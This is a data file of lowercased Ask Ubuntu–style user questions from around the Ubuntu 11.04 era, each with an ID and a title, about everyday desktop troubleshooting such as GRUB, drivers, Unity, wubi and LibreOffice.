42659	how to switch language spellingcheck on the fly when changing keyboard with alt-shift ?	i just recently installed ubuntu 11.04 , english version that comes with libreoffice . i also installed greek language . is there some way to make writer recognize my input language ( english - greek ) and apply spelling check on the fly , according to my input language ? for example , i type a sentence in english , then switch keyboard input ( alt-shift ) and type a sentence in greek . writer does no recognize the greek sentence and underlines it red . ms office and oo under windows does it ... as soon as you change input language ( keyboard layout ) , the real time spelling checker changes also between languages ... thank you in advance ...
42660	playing vcds on ubuntu	what can i play vcds with ? i tried mplayer , but it ran the intro scene for a few seconds and exited ( i 've to choose from the menu in that scene ) . does totem/movie player support vcd and stuff ? update i was able to to get tracks using mplayer vcd : // command . nothing plays from the first track ( mplayer vcd : //1 ) , video only appears on the second track . on vlc i could play it normally from the gui . is there anyway to play vcd on the default softwares ( media player/banshee ) ?
42662	90 % cpu used by ubuntu one	on my laptop ( ubuntu 10.04 ) , the daemon ubuntuone-syncdaemon uses more than 90 % of cpu . even if i stop the synchronization . the only way to stop this is to sigkill the daemon ; but , obviously , my files are not synchronized and i obtain a lot of `` conflict '' files . could you give me a clue to stop this problem ? thank-you ! gilles
42663	how to make cursor change from thin line to block based on normal or insert mode in console vim on gnome terminal	i am switching from gvim to using console vim using the gnome terminal 2.32.1 . i really liked in gvim how the cursor would be a solid square when in normal mode and thin line when in insert mode . is there a way of producing this functionality when running console vim in the gnome terminal ? if it 's not possible , what tricks are there for knowing what mode you are in ? i know there is the mode displayed at the bottom of the screen , but that does n't seem to be as helpful as the cursor ( which is where my eyes are looking ) . or do you just get used to it with practice ?
42664	ubuntu gives black/no graphics after waking up from sleep	first , though this is a duplicate question , but i am asking because the other posts didnt help me , and my case is a little different i guess . this problem is not recent but since 4-5 ubuntu releases ... when i put my system to sleep , it goes to sleep but when wakes up the screen is totally blank . at this moment the real os is awake as from a diff system , i can do ssh and even tried to play an mp3 file through mplayer and the music played through the speakers . so the real issue is that the graphics system is not waking up . i can debug whats wrong and can compare few things before the sleep and after wakeup , but i dont know what tools would help me to see whats wrong with the graphics hardware not waking up . so please help me debug this problem . ps : i am on ati x700 mobility radeon graphics . edit : logs links : before log : http : //paste.ubuntu.com/607342/ after log : http : //paste.ubuntu.com/607346/
42667	who to follow on twitter if you are interested in ubuntu ?	i 'd like to know whom i should follow on twitter , to get my daily dose of ubuntu news , tips , and random bits . which members from the ubuntu community are active on twitter ?
42671	ca n't install on a hp mini 210-1100	i just ca n't seem to install ubuntu on my netbook , when trying to boot the liveusb the netbook just sits there and if i try to boot ubuntu via wubi it installs without a problem but there 's nothing added to the windows booloader and if i add the entry manually grub4dos just gives an error and does nothing . the mini comes with an instant-on linux based os , hp 's quickweb but i find it to be extremely slow , i disabled it thinking it may fix the issue of the liveusb not booting or wubi not being added to the windows bootloader , but it did n't helped . it 's specs are an atom n455 ,1gb ddr3 ram and and intel gma3150 .
42672	package not available for this type of computer	i am creating a deb package for an opensource project i have started called widemargin when i try and install my deb package in 10.10 using the ubuntu software center i get the following text on screen . sorry , 'widemargin ' is not available for this type of computer ( i386 ) . despite this message it still installs and works fine . in my control file i have the following line : architecture : all i assumed this would allow it to work on all architectures . what am i doing wrong ? as this is an open source project please feel free to poke around in my package source and tell me whats wrong . i ran the following command as requested : dpkg-deb -- control widemargin_1.0.0_all.deb and it produced the following results : package : widemargin version : 1.0.0 architecture : all maintainer : daniel hughes < trampster @ gmail.com > installed-size : 4744 depends : mono-runtime ( > = 2.6.7 ) , libgtk2.0-cil ( > = 2.12.10 ) , libmono-sqlite2.0-cil ( > = 2.6.7 ) section : unknown priority : extra homepage : https : //bitbucket.org/trampster/widemargin description : quick and simple bible software . bible software with a focus on speed and usability .
42673	why i got : requires installation of untrusted packages	i got '' requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . '' with list of packages : '' gir1.2-panelapplet-3.0 gnome-panel gnome-panel-bonobo gnome-panel-data libpanel-applet-3-0 libpanel-applet2-0 libplymouth2 libpulse-browse0 libpulse-mainloop-glib0 libpulse0 plymouth plymouth-label plymouth-theme-ubuntu-logo plymouth-theme-ubuntu-text postfix pulseaudio pulseaudio-esound-compat pulseaudio-module-bluetooth pulseaudio-module-gconf pulseaudio-module-x11 pulseaudio-utils python-glade2 python-gtk2 software-center ubuntu-docs ubuntu-sso-client update-manager update-manager-core '' i udestand why this happen literally - but i do not know why i have untrusted packages in my ubuntu . in my understanding there are two ot three possibilities : i installed untrasted packages to my ubuntu -but in that case i shuld add certificake to my repo and then i should not receive this king od message i suspect janitor removed some certificates and this is a cause something else . please help , t
42675	firefox with ubufox does not find plugins	when i try to open a flash site or java applet , firefox tells me that there are some missing plugins available . but once i click on that button of the top bar , firefox does n't find anything . only manual install is then available . i remember that in previous versions of ubuntu , firefox recognized automatically all plugins and installed them trough apt etc ... is this a bug ? only me with this problem here ? because for new users this is an important feature ! ps . the ubufox extension is still installed
42676	is there a copy handling progam available that can queue , pause and resume ?	is there a copy handling progam available for ubuntu ? something similar to copy handler on windows which can queue , pause and resume files being copied ?
42682	`` failed to execute default file manager : input/output error ''	i am getting the below error when i try to go places > home folder for example . i can run nautilus manually though .
42684	how do i download old unsupported packages such as kernel headers ?	i am using the now unsupported jaunty . however , i 'm also running an older unsupported kernel which i wish to programme . i 'm trying to make new system calls in kernel 2.6.21 and one of the new system calls use 'sys_write ' function , but to use this function , i realized that i must install kernel header file according to 2.6.21 version . i tried `` apt-get install linux-headers-'uname -r ' `` , `` apt-cache search linux-headers- $ ( uname -r ) '' but i ca n't find anything.. # include < linux/kernel.h > # include < linux/init.h > # include < linux/module.h > # include < linux/syscalls.h > # include < linux/fcntl.h > # include < asm/uaccess.h > additionally , above header files is what i want to . how can i get the kernel header file for something that is now unsupported and not in a current repository ?
42685	grub error : no loaded kernel	i 'm quite new to linux , so please bear with me . on my pc i had installed windows 7 and ubuntu 9.04 , i then switched to kubuntu 10.x , and yesterday i installed the new main update 11.x and i left the computer to finish installing , when i came back in a few hours i saw that my monitor was blank and looked as though it was unplugged , i checked all the cables , tried moving the mouse , pressing keyboard , still nothing , but as i said the monitor looked as though it was unplugged . thus i pressed the reset button on my computer , the monitor started working as normally , but i ca n't boot into windows or kubuntu . this is all i can see on the screen : gnu grub version 1.97 beta 4 [ minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device/file completions . ] i do n't have live cd to repair it using cd . is maybe there any other way ? if not , how should i repair it using cd once i 'll have it with me ? also is it possible to repair it or will i have to format the partition ? if i should format , which partition , only the linux one , and windows 7 can remain the way they were ? thank you for all your help and ideas .
42687	can not install vmware-tools : a previous installation of vmware tools has been detected	i encounter this error : the path /usr/src/linux/include is not an existing directory . hi there are still issues as listed below . please advise ronald @ ronald-virtual-machine : ~/desktop/vmware tools/vmware-tools-distrib $ sudo ./vmware-install.pl [ sudo ] password for ronald : a previous installation of vmware tools has been detected . the previous installation was made by the tar installer ( version 4 ) . keeping the tar4 installer database format . you have a version of vmware tools installed . continuing this install will first uninstall the currently installed version . do you wish to continue ? ( yes/no ) [ yes ] error : unable to execute `` /usr/bin/vmware-uninstall-tools.pl . uninstall failed . please correct the failure and re run the install . execution aborted . ronald @ ronald-virtual-machine : ~/desktop/vmware tools/vmware-tools-distrib $ `chmod +x /usr/bin/vmware-uninstall-tools.pl` chmod : can not access `/usr/bin/vmware-uninstall-tools.pl ' : no such file or directory
42691	how to make avertv tuner work	note : i no longer own this card i have a pc with avermedia avertv super 007 . i have been so far unsuccessful in making it work . could anyone help me ? specs : -intel pentium 4 -2gb ddr1 -ubuntu 11.04 -latest updates
42694	unity attribute error when resetting	lately , as i was trying to install themes and stuff for my desktop with compiz , i enabled the desktop cube . i resolved the conflicts , then all the menu-bars disappeared . after a google research , i found some sites that told to reset unity using the terminal command : unity -- reset but there , i got an `` attributeerror : object has no 'str ' attribute '' ( i do n't remember the exact error , but it was an attributeerror about string ) , line 83 at if current_profile_gconfvalue.get_string ( ) == 'unity ' : . it is easy to correct it , with a `` try : ... except : '' block , but where do i report it , and where could i help ?
42695	tv program like dscaler ?	i have a wii console plugged to a tv card on my pc , and connected to a monitor , i would like to have that computer with a small operating system ( maybe ubuntu-server with the minimum available gui , and with access to the tv card ) . the only problem is that , for the moment , the solution that i have found makes me use a windows xp with dscaler , and i wanted something lighter , can you help me ?
42698	how to test a live-cd/usb + add drivers for broadcom wireless card + reboot and continue the live-cd/usb testing ?	is it possible to test a live-cd/usb by booting from it , adding drivers for a broadcom wireless card , rebooting after that and have the drivers installed to keep on testing the live-cd/usb ?
42703	working usb wifi 802.11n 5ghz network adapter in ubuntu ?	does anybody have a personal recommendation for a usb wifi network adapter that : has decent linux drivers supports 802.11n speeds will connect to a wifi signal in the 5ghz band ? i 've spent some time in google , the ubuntu hardware compatibility pages and reading through various launchpad bug trails about support for the ralink chipset variations being a bit spotty . i 'm really finding it difficult to see any clear choice for me to purchase , so could do with a nudge in the right direction . it would be ideal if it worked out of the box with kernel drivers , but i 'll mess around with ndiswrapper etc if required . thanks in advance !
42707	how to allow upstart task to block system boot ?	i 'm writing an upstart task which runs at runlevel 1 . this is for an ecrypted system , and the task 's job is to verify the integrity of the mbr & /boot . as such , it is important that this task runs as early as possible during system boot ( so i 've chosen runlevel 1 ) . 99 % of the time this task will just exit silently , but if it detects any problem , it needs a way of letting the user know , and ideally pausing the system boot until the user confirms . i 've tried the following as a test , but i can not interrupt the system boot . any suggestions ? start on runlevel [ 1 ] exec echo -n `` warning : mbr and/or /boot changed . press any key to continue . '' exec read console output thanks in advance !
42708	how to learn chess with ubuntu software ?	i am willing to learn how to play chess and i am an absolute beginner . i know that ubuntu has a lot of chess programs . so , after reading about tactical stuff on the internet , i installed a program called `` brutal chess '' and started playing . i was allways beaten by the computer , so i decided to try other programs . i finally found dreamchess , for which the ai is not so though . though , i also discovered eboard and crafty , which seem to allow me to analyse games and to study from these analysis . i just do n't know how to do this . does anyone know how to do that ?
42710	does powering off the pc without shutting down harm the system ?	i accidentally killed compiz in my unity session and could n't restart it . so i powered the pc off with the hardware button . i am wondering if that could cause damage to my system ? i did n't have any applications running .
42711	how to install ubuntu as the single os on a macbook ?	how do i install ubuntu as the only os on a macbook ? that is , i 'd like to completely remove mac os x and install ubuntu . i 've tried dual-booting , but i 've had so much trouble that i prefer to have only ubuntu installed .
42724	what 's the meaning of the ubuntu logo ? where does it come from ?	what 's the meaning of the ubuntu logo ? where does this logo come from ?
42726	ibus does not show option in input method except chinese	i have just started using ubuntu 11.04 ( any linux os for that matter ) . i am trying to get hindi phonetic typing option to work . so far i have not been able to figure it out . can you tell me step by step how to do it . i have already checked hindi in language support , i have also tried getting m17n using terminal commands as suggested in similar forums , but it does not seem to work .
42728	grub-update doesnt find the other os anymore	i installed grub customizer . unfortunetly i unticked search for other os . this action worked and gub-update shows only the current ubuntu 11.04 ( i have also windows and another ubuntu installed ) . afterwards i ticked the `` search for other os '' again , but still grub-update shows only my ubuntu 11.04 . does anybody know how to `` teach '' grub to look again for other os ?
42730	why is wubi limited to 30gb ?	why is the maximum size of a wubi-installation limited to 30gb ? if someone has 1tb hdd drive but ca n't format or create new partitions it would be great to have a bigger wubi .
42731	install to sd card	i 've been wondering about improving the performance and battery life of my netbook by installing my root partition to an sd card . will there be any performance benefits ( or drawbacks ) ? are there any special changes that should be done to make this work better .
42738	receiving unwanted emails from launchpad	i had clicked something in launchpad , under impression i will receive answers by email , relevant to my question . but now i am getting a flood of completely irrelevant emails , hundreds a day , which i diverted to trash . but i ca n't find where to un-click this option , i have to frequently empty thousands of irrelevant emails from trash , which deletes other messages as well , the ones i might possibly want to recover . thousands of messages ca n't be managed the `` normal way '' , it 's like finding needle in hundred haystacks .
42740	how to change the about : config shortcut in unity ?	how can i change it to gunity ?
42741	how to automatically switch monitors with my laptop dock	i have a dell precision m4300 with a dell dock pro1x running ubuntu natty . when i have the laptop docked the lcd display is off and i use two external monitors however when i undock the laptop it does not switch to the laptop screen . the same happens when i dock the laptop , it does not switch to the external monitors . if i reboot the laptop it will choose the correct setup but it will not automatically change monitors with ubuntu running . my xorg.conf
42744	any hope for unity using ati radeon ?	i am currently running kubuntu 10.04 on a lenovo t500 laptop with ati radeon hd 3650 . i want to switch to gnome with unity , but encountered the following impossible situation : as reported in this bug , and in several other reports , ubuntu 11.04 wo n't boot when using the open-source ati driver . it crashes before even starting . therefore , i am forced to use the fglrx driver . however , unity refuses to work with the ati proprietary driver - it simply kicks back to the classic gnome desktop . running unity_support_test , as suggested here , terminates without any message , with exit code 139 . is there any known good configuration or workaround that will let me run unity on this radeon card , preferably that been tried and tested ?
42747	after upgrading , effects are very slow	... programs run normally , but the effects are very sluggish . how can i fix this ?
42748	changing my home folder 's owner	i recently updated my ubuntu to 11.04 and have run into an issue . i decided to do a fresh install instead of an upgrade and made my username different from my last . now everything has my past usernames permissions . how can i transition my home folder into my new installation/username . any help would be greatly appreciated .
42750	number keypad not working regularly	i have a toshiba laptop , have full numbatic keypad on the right , ca n't use it anymore . 8,6,4,2 working like mouse arrow . i tried to enable/disable it but still same . how can i fix it ? thanks in advance
42764	mouse locks when keys are pressed	whenever i play minecraft and try to walk and turn at the same time , i ca n't . when i hit keys on my keyboard , my mouse locks in place . ( this happens both in and outside of minecraft ) ( ubuntu 10.04 lucid , mac mini server , nvidia graphics )
42765	how to show opera in the dash ?	well , i 've changed the default browser to opera in the preferred applications : firefox is still in the dash . before this chromium was the default browser , and it was in the dash after making it the default browser . for example : i 've changed the default music player to clementine and it did n't take time to show in the dash : but the problem is still that opera is n't showing in the dash , i think that there is something preventing opera from showing in the dash .
42767	enqueue option in foobnix ?	i loved foobar2000 in windows , and with the same hope i installed foobnix in ubuntu 10.04 . when i want to add new file to playlist , i 'm not able to find the enqueue button . also , when hit 'enter ' on the song file , it appends to the playlist in amarok or exaile , but here in foobnix it 's not . it 's creating separate tabs , and when i changed the settings to use 'single tab ' , only the latest appended song is visible . please help me with enqueue option in foobnix . thank you
42768	drop shadow and other ui issues with classic interface	after using unity for a while , i realized that its not for me and i switched to classic interface , but there are some issues which i think , make it worse compared to 10.10 . here are the problems i 'm facing . note : i have nautilus elementary installed . panel shadow looks artificial ( one can observe its sudden appearance when restoring or minimizing the maximized windows ) . when using default ambiance theme , shadow depth remains constant no matter what i set in compiz 's window decorations plug-in . ( solved ) nautilus context menu ( and also standard menus ) drop-shadows are not showing up at all . ( solved ) mouse cursor theme can not be changed , which reminds me of the issue i faced in 10.04 . ( solved , kinda ... ) evolution does not remember the width of message list pane and every time i open it , i sets the width to default ( quite large to fit the message view ) . considering the above troubles , i 'm really thinking of reverting back to 10.10 which was perfect as far as classic ubuntu interface is concerned , but i do n't want to loose my fresh installation . what can i do to solve the issues i mentioned ? update : while waiting for any helpful answer , i was googling over the issues i was facing and somehow , managed to solve some issues from the above list . which is as follows : nautilus elementary drop shadows that was due to some problem between rgba and compiz , so it can be solved by disabling apps/nautilus/preferences/rgba_colormap from gconf-editor . source here . deep ambiance shadows having deep shadows in ambiance theme is hard-coded , thus it overrides any settings that you have in compiz . so , one can change that by editing metacity theme configuration file of ambiance . source here . changing mouse cursors while the solution of this issue might not be a preferred way , but works if you really want to change the cursor ( like me ) . you can do it using following command in terminal and select cursor theme from the list . sudo update-alternatives -- config x-cursor-theme source here . so , that 's all i have managed to solve , and evolution issue and panel shadow issue still exists . any help regarding for them and more `` elegant '' way to change mouse cursors in 11.04 is welcome .
42773	setting up on ubuntu server for pxe lan install for installing windows	computer has only lan . how can i make on ubuntu someking pxe server where ill put windows iso or windows cd in ubuntu computer so that comp with just lan can install windows ?
42775	increase persistent file size to greater than 4 gigabytes	my usb 's 16 gb , but i only get to use 4 gb in persistence file . any way to increase it ?
42779	what user-friendly vpn software is available ?	other than the network manager applet at the natty panel , is there any other user-friendly vpn tool available . one which has a gui and can be easily setup . ref . question : connman not detecting already existing wireless network .
42781	can i install a 2nd ubuntu next to preexisting win7 + ubuntu wubi installation ?	i am running a dualboot with win7 and ubuntu 11.o4 wubi installation . now my wubi installation became to small and i have a boot delay presumably due to ubuntu being installed on a ntfs partition ( i see that via bootchart ) . therefore i want to install ubuntu a second time on a seperate partition . however i want to avoid rendering my machine unbootable or loosing data on the wubi installation before the new installation is running . do you see any problems ? thanks , florian
42782	can i try libreoffice 3.4 without installing it ?	i 'd like to try the new version but do n't want to replace the old version . are there any binaries i could use ?
42784	ubuntu uec moving to openstack : what to do about new installations for the next 6 months ?	so , the news that ubuntu will use openstack for its cloud fabric starting with oneiric is exciting , but what to do today ? i 'm ready to begin deployments that will not be needed in production until oneiric is released , but i 'd like to get starting on them today . it does n't seem to make any sense to start with eucalyptus at this stage . so , where to turn ? can i easily get started on openstack right now , knowing that it is likely to be buggy and such ? should i just get in with the server team and start working with the alpha on june 2 ?
42787	how do i enable multi-row layout for the workspace switcher applet in metacity ?	i 'm looking for a way to increase number of rows in workspaces layout , using metacity with no compiz installed . i.e . 3 cols and 2 rows . using gconf-editor i can only change number of workspaces horizontally , but not vertically , even if it seems to be possible . i 'm working on a ubuntu 11.04 machine with classic gnome .
42788	sensor applet does n't save settings after restart	i installed the sensor applet in ubuntu 11.04 to check the temperature . everything works fine ; however , changes i make to the preferences are lost after every restart . how can i save my setup ?
42797	closing gnome-shell leaves ubuntu without a shell	my box is running ubuntu 10.10 . i installed gnome shell to experience gnome 3 from the ailurus package manager . it installed fine . i ran the shell by typing the following in the terminal gnome-shell -- replace this replaced ubuntu 10.10 's gnome 's 2 gnome panel with gnome shell . i tinkered around a bit and changed a few things like enabling alt-tab . however if i close the terminal which was used to launch gnome-shell , ubuntu is left without a shell . i can not restart gnome shell since keyboard input is somehow disabled when gnome-shell is closed and all i am left with is the desktop with the computer and home icon 's and the windows which were open without their titlebars . mouse works but keyboard input does not work . i had to reset my machine , which then loads the default ubuntu shell , gnome panel . on re-running gnome-shell , i find that my custom settings were not saved ( alt-tab is disabled ) . so i created a launcher to point towards gnome-shell . this makes it difficult to close gnome-shell ( and get a shell-less ubuntu ) , but restarting still leaves me with ubuntu 's default shell . how do i load ubuntu 's default shell ? how do i set which shell to use as default ? i am afraid i may not be using the correct terminology .
42798	sound application indicator for esound is missing after i uninstalled pulseaudio ?	i removed pulseaudio as it seemed to be in conflict with skype and vlc but now the volume indicator applet is gone and the action keys wo n't turn up nor down the volume . is there a solution ? or is pulseaudio required for the application indicator ?
42799	do kernel downgrades to fix power regressions in newer kernels ?	i am currently running natty with kernel 2.6.38-8-generic on a vaio laptop running ati mobile radeon and a core i5 cpu . i was wondering if it were possible to downgrade from kernel 2.6.38-8 to something earlier that does n't have the power and battery life regression problems that have been keeping me from using ubuntu abroad . any help is appreciated .
42801	how long does wubi take to download and/or save place ?	i 'm downloading wubi now and it 's been downloading the iso torrent for maybe 2hrs-ish . is there anyway to check how far along it is ? also , is there a way to save my place or if i cancel this or my computer dies , will it lose the place ? if i do lose my place . can i download a iso myself and place it somewhere that wubi will grab from so it just installs it , not downloads the iso ? ( this way i can watch the % too ) im at a conference and my internet is fluctuating between 3-7mbs ... if that helps
42803	how do i report a missing package dependency during an upgrade ?	a friend of mine ( somewhat new to linux ) recently upgraded from 10.10 to 11.04 and his os broke from the upgrade . a few minutes of troubleshooting showed that the culprit was the pae kernel that the upgrade decided to install since it determined he had 4gb of phyisical ram . more specifically the upgrade forgot to install the linux-headers-generic-pae required by the closed source nvidia drivers . i 'm not entirely sure how to report this bug to the devs . its an easy fix ( after booting into the non-pae kernel and installing the package everything worked ) , but they are encouraging users to use the built-in bug reporting system and i 'm not entirely certain how to report update bugs .
42808	is there a way to add a main menu button to the unity panel ?	i like many of the features of unity ( ubuntu 11.04 ) . i use a netbook and so enjoy having less wasted space . the side menu is fine too . however where is the main menu ? using the dash to get there is not easy as the icon is already off the bottom of the screen ( i tried to move it to the top ) and besides dash is slow , slow , slow . the main menu is one click and move the mouse to the application you have but are not sure of the name and click and go . dash means a row of most used , then a row of others which needs a click to see the rest ... then you click that and still have to search some more . i see something about `` white listing '' stuff for the unity panel . is there some way to use this to add a main menu . i can live with and even enjoy everything else .
42814	need to set up tomcat and jsf on an ubuntu machine	as the title says , i need to set up tomcat and jsf on an ubuntu machine , and seem to be running into issues because the tutorials i find online are out of date . can someone provide an up-to-date tutorial , or provide me with some simple steps ? i already have the tomcat6 package installed using apt-get install , but am totally lost from here . i will first be testing on my local machine , and then eventually using it on my server , so security and best practice advice would be appreciated .
42816	how can i install awn trunk ?	i 've been trying to install awn trunk in natty ubuntu classic desktop , but after add the ppa : sudo add-apt-repository ppa : awn-testing/ppa . update the sources : sudo apt-get update . and install the files : sudo apt-get install avant-window-navigator-trunk avant-window-navigator-data-trunk python-awn-trunk awn-settings-trunk awn-applets-python-core-trunk python-awn-extras-trunk awn-applets-python-extras-trunk awn-applets-c-core-trunk awn-applets-c-extras-trunk i 've got the following ( my system is in spanish ) : `leyendo lista de paquetes ... hecho` `creando árbol de dependencias ` `leyendo la información de estado ... hecho` `el paquete awn-applets-c-core-trunk no está disponible , pero algún otro paquete hace referencia a él . esto puede significar que el paquete falta , está obsoleto o sólo se encuentra disponible desde alguna otra fuente` `el paquete awn-applets-python-core-trunk no está disponible , pero algún otro paquete hace referencia a él . esto puede significar que el paquete falta , está obsoleto o sólo se encuentra disponible desde alguna otra fuente` `el paquete awn-applets-c-extras-trunk no está disponible , pero algún otro paquete hace referencia a él . esto puede significar que el paquete falta , está obsoleto o sólo se encuentra disponible desde alguna otra fuente` `el paquete awn-applets-python-extras-trunk no está disponible , pero algún otro paquete hace referencia a él . esto puede significar que el paquete falta , está obsoleto o sólo se encuentra disponible desde alguna otra fuente` `e : el paquete «awn-applets-python-core-trunk» no tiene un candidato para la instalación` `e : no se ha podido localizar el paquete python-awn-extras-trunk` `e : el paquete «awn-applets-python-extras-trunk» no tiene un candidato para la instalación` `e : el paquete «awn-applets-c-core-trunk» no tiene un candidato para la instalación` `e : el paquete «awn-applets-c-extras-trunk» no tiene un candidato para la instalación` am i doing someting wrong ? , or there is no awn trunk for natty ? .
42818	disable resizing of specific window using devilspie	i wonder if it is possible to disable resizing of a specific window using devilspie ? i currectly have a terminal window docked to my desktop background with title bars and frame and everything removed , though i can still resize it and the little resize-button is still there in the bottom right corner . i know that button can be removed on all windows , what i need is how to remove it on a specific window only , preferably without using compiz . thanks !
42819	application will not open	i installed swami from the software center but when i try to open it , nothing happens . what 's going on here ?
42820	flash video is insanely choppy ?	i tried changing my refresh rate in compiz but that did n't work . it 's just so slow and choppy you would n't believe . i know it 's not my graphics card because before i installed ubuntu i had windows xp and it was fine . any ideas ? 00:02.0 vga compatible controller : intel corporation 82g965 integrated graphics controller ( rev 02 ) that 's my graphics card .
42821	is there a way to install lo-menubar as per-user local extension ?	i 'm using multiple libreoffice profiles ; one for normal work , second for some pseudoheadless automation with vncserver and macros , like : soffice -calc -env ' : userinstallation= $ sysuserconfig/ ' $ dir'/openoffice.org ' `` macro : ///standard.module1.saveresult ( \ '' file : // $ outfile\ '' ) '' it 's incredible useful . what 's more , i can peek at the current progress with vncviewer any time . installing lo-menubar package causes the running second profile try to use unity 's globalmenu , which breaks the whole magic . is there a way to use lo-menubar as a normal per-user ( pre-configurationdir ) extension ?
42827	ubuntu does n't show me all available wireless networks	i have a problem when using ubuntu . it does n't show me all available wireless networks whereas suse/opensuse lists them all . it sometimes shows them to me but mostly it does n't . what i can do ?
42829	ca n't view files on partitioned external drive	i 'm trying to recover data off an old internal laptop drive now residing in a usb caddy . the hard-drive is pretty knackered and started giving warnings about impending failure , so i would rather not boot from it . it has three partitions , one of which does not mount automatically , but i can mount it and see the files in the terminal . the other two mount automatically on /media/acer and /media/5e93-a93d when i plug the hardrive in , but i ca n't see any files on them - they appear empty in nautilus/thunar and the terminal . i know there are two fat32 filesystems there , one with windows xp on , and another that i used for my documents . as far as i remember they were both nearly full . they show up on system monitor as being completely empty . when i open gparted i get this confusing table : gparted screenshot showing weird partition usage amounts ( ca n't post images sorry ) the 'sized ' , 'used ' and 'unused ' columns do n't add up . this was after i mounted 'pqservice ' partition on '/media/sdc1 ' , which mounts without any issues ( albeit not automatically ) . i have tried using ddrescue to get the files off , but i could only get it to output a single file ( i was after a directory structure ) , and the file that it did output was completely empty , so i guess ddrescue ca n't see anything there either . what 's going on ? additional details the hardrive is 60gb seagate momentus 4200.2 . caddy is a âł20 unbranded thing that my girlfriend bought at maplins . this harddrive comes from an old acer aspire 1682wlmi . it came with windows on the 'acer ' partition , nothing on the '5e93-a93d ' partition ( i used it for data ) , and the 'pqservice ' was not visible under windows . it is my understanding that fat32 partition can not be bigger than 32gb , and i suspect it was cheaper for acer to simply partition the drive in this way rather than use ntfs . it has at one time been a dual-boot system , but i took that off .
42833	how do i show a list of applications in unity ?	i 'm more of a visual person . i prefer scanning a list of icons to being presented with a search box and being forced to remember the name of the thing i want . is there any way to view a list of installed apps similar to the `` applications '' menu in previous versions ?
42838	udev error when running live cd or trying to install	so i 'm trying to install 11.04 since i 've been a fan since 9.04 . but both , when starting the live cd , and when installing inside windows i get an error at boot up : udevadm settle - timeout of 180 seconds reached , the event queue contains : /sys/devices/pci0000:00/0000:00:02.0/0000:02:00.0 ( 919 ) udevd [ 68 ] : worker [ 85 ] unexpectedly returned with status 0x0100 udevd [ 68 ] : worker [ 85 ] failed while handling '/devices/pci0000:00/0000:00:02.0/0000:02:00.0' and thats the entire error . i 'm not an expert but it might have something to do with the new graphics card i installed a while ago . it 's an ati radeon 5250 . i 've heard that people are having problems with it . so hopefully somebody in the community will have an answer to the problem as i have been wanting to get back into linux for a while now after being with windows 7 for about a year now . this error stopped me doing so . i 've tried installing in a few different ways : cds dvds usb drives installing it inside windows ( wubi )
42840	is it possible to import/export radio station as a list into/from banshee	i have a list of radio stations that i am interested in importing to banshee . after i add more stations before next upgrade i would like to keep that list somewhere , so it can be imported into banshee after system upgrade . is there a way to do it easily ? any hints to where and how banshee handles this list internally would be appreciated . thanks !
42842	putty-like copy/paste	for ages i 've been using putty when working with *nix servers , and i really got used to it 's copy & paste method : select , left-click - for copy , just right-click - for paste . how can i set ubuntu terminal the same way ? i see there is a shortcuts configuration , but it does not allow me to set keys i need . ctrl+shift+c , ctrl+shift+v is just braking my fingers . i know there is a menu on right-click , but i do n't need it .
42844	can i create a quicklist sub-menu ?	can i create a quicklist sub-menu for my launchers ? like if i put ubuntu and on hover it opened a sub-menu with all my ubuntu links ?
42850	how do i add english-uk thesaurus and other locales to libreoffice ?	i have been trying to use english-uk thesaurus in libreoffice but so far can not get it to work . i have installed mythes-en-us as only it was available in repos . as suggested in some forums i searched for openoffice.org thesaurus , but again us version was available . as a result i ca n't enable thesaurus when i choose english uk : as instructed elsewhere i tried this : cd /usr/share/myspell/dicts sudo ln -s th_en_us_v2.dat th_en_gb_v2.dat sudo ln -s th_en_us_v2.idx th_en_gb_v2.idx still the result is same as shown in above screenshots . what can be done now ?
42852	pgadmin iii : error : function postgis_full_version ( ) does not exist	i 'm running natty : attempting to get pgadmin iii running . so i went to the pgadmin download section for ubuntu ... but did not see natty instructions . so i downloaded the natty pgadmin iii .deb from launchpad this fired up ubuntu 's software center . i installed . everything worked . i opened up pgadmin iii and connected to my local postgis database successfully . now ! i 'm following along in the text postgis in action and it tells me to execute : select postgis_full_version ( ) ; this of course gives the error , as per title : error : function postgis_full_version ( ) does not exist line 1 : select postgis_full_version ( ) ; ^ hint : no function matches the given name and argument types . you might need to add explicit type casts . ********** error ********** sql state : 42883 character : 8 update : furthermore , i ran the exact query in phppgadmin and got : sql error : error : function postgis_full_version ( ) does not exist line 1 : select postgis_full_version ( ) ; ^ hint : no function matches the given name and argument types . you might need to add explicit type casts . in statement : select postgis_full_version ( ) ; this is why i 've placed this in the ubuntu se - similar results from phppgadmin and pgadmin iii suggest it 's not an issue with the respective gui , but rather ... the os ? scoured google , ca n't seem to find anything related ... thanks in advance .
42855	how do i open multiple terminals ?	i just downloaded ubuntu 11.04 and as far as i can remember , there was the option of opening multiple terminals in tabs in ubuntu . i can not discover this feature in 11.04 . also , as a general query , suppose i open emacs from the terminal , then i would n't be able to do anything else on that terminal as long as i have emacs running , so what is a good way to multi-task ?
42857	what resolution works best ?	i want to buy a laptop and install ubuntu 11 on it . is there a particular screen resolution or dimension that is ideal ? for example , if i 'm choosing between 1600 x 900 or 1680 x 1050 , these have different ratios of height to width , and the second is ( as far as i know ) a less common resolution . will any of these things matter , or are all resolutions that a major retailer sells be supported seamlessly ? part of the reason for my question is that i had a little trouble with ubuntu 9 on a monitor with a 4:3 ratio .
42859	why does skype shut down by itself ?	so i installed the brand-new 11.04 and , of course , skype beta 2.2 . however , when i leave my computer idle for some time , skype just shuts down and then i have to open it up and login again . any thoughts/suggestions ?
42867	modifying mouse/touchpad sensitivity	i would like to increase my mouse sensitivity . going to system settings- > mouse and adjusting the sensitivity does n't seem to affect anything . in the previous version i modified it in the advanced system settings by manually inputting the threshold and acceleration but i can no longer find that menu . ideally i want to have a constant acceleration with high sensitivity , is this possible in ubuntu ? i have searched for hours and was unable to find any relevant answers . almost everything i have come across mentions the xorg.conf which no longer exists . help would be much appreciated , thanks !
42878	firefox global menu bookmarks no middle/right click ?	i wanted to ask if this was a feature or bug before i submitted a bug report . before unity/global menu , you could open bookmarks in a new tab by middle clicking or right click `` open in new tab '' . in natty , this opens the bookmark in the current tab only . can anyone confirm this ?
42882	should i use the nouveau gallium 3d driver ?	does the nouveau 3d driver works with ubuntu natty narwhal ? what are the drawbacks of using this driver , i.e . is there any chance of breaking the desktop using this driver ? the nvidia driver will not install and i can only use unity 2d . thank you .
